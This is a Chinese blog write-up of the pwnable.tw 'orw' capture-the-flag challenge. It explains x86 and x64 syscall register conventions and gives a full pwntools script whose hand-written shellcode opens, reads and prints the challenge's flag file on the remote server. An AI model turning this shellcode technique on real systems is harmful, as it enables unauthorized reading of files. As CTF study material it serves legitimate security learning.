美文网首页
[pwnable.tw]-orw

[pwnable.tw]-orw

作者: 2mpossible | 来源:发表于2018-12-20 09:06 被阅读0次
  • 考验我们直接编写shellcode的能力,这里注意

  • 对于32位程序,应调用int $0x80进入系统调用,将系统调用号传入eax,各个参数按照ebx、ecx、edx的顺序传递到寄存器中,系统调用返回值储存到eax寄存器。

  • 对于64位程序,应调用syscall进入系统调用,将系统调用号传入rax,各个参数按照rdi、rsi、rdx的顺序传递到寄存器中,系统调用返回值储存到rax寄存器。

exp:

from pwn import *

context.binary = './orw'

#p = process('./orw')
p = remote('chall.pwnable.tw', 10001)

shellcode = asm(
                #fd = open('/home/orw/flag',0)
                '''
                push 0x00006761;
                push 0x6c662f77;
                push 0x726f2f65;
                push 0x6d6f682f;
                mov ecx, 0x0;
                mov ebx, esp;
                mov eax, 0x5;
                int 0x80;
                '''

                #read(fd,bss+0x200,0x40)
                '''
                mov ebx, eax;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x3;
                int 0x80;
                '''

                #write(1,bss+0x200,0x40)
                '''
                mov ebx, 0x1;
                mov ecx, 0x0804A260;
                mov edx, 0x40;
                mov eax, 0x4;
                int 0x80;
                '''
                )
p.sendline(shellcode)


p.interactive()

参考文章:

相关文章

  • Pwnable.tw orw

    这题还是比较简单的 题目的描述看 显然是要写shellcode来读flag文件 binary会直接执行写入的she...

  • [pwnable.tw]-orw

    考验我们直接编写shellcode的能力,这里注意 对于32位程序,应调用int $0x80进入系统调用,将系统调...

  • orw ---- pwnable.tw

    链接见标题。 作为一个新新手,看到第一行的时候就开始感到诧异,为什么题目会给出flag的路径呢。 接下来看第二句,...

  • pwnable.tw orw wp

    题目要求:Read the flag from /home/orw/flag.Only open read wri...

  • 【pwnable.tw 系列】orw

    概述:本题是pwn的入门级题目,主要是让初学者学会编写shellcode。 1、首先file start,可以看到...

  • pwnable.tw 题解一 Start orw calc d

    0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...

  • house of orange总结

    例题pwnable.tw BookWriter 原理可见https://github.com/shellphish...

  • 阅读《Android Apk 编译打包流程,一文带你详细了解》

    原文地址https://mp.weixin.qq.com/s/_orW4HFDYgYSQFrT04Beog[htt...

  • 【CTF-PWN】pwnable.tw_orw

    pwnable.tw_challenge_orw 载入IDA分析: 0x01 main 这里很简单: 0x02 s...

  • [pwnable.tw]-Start

    程序很简单,直接用汇编int 80实现的读写退出,没开NX保护,然后有个栈溢出漏洞,先泄漏栈地址,然后往栈里写sh...

网友评论

      本文标题:[pwnable.tw]-orw

      本文链接:https://www.haomeiwen.com/subject/vvyekqtx.html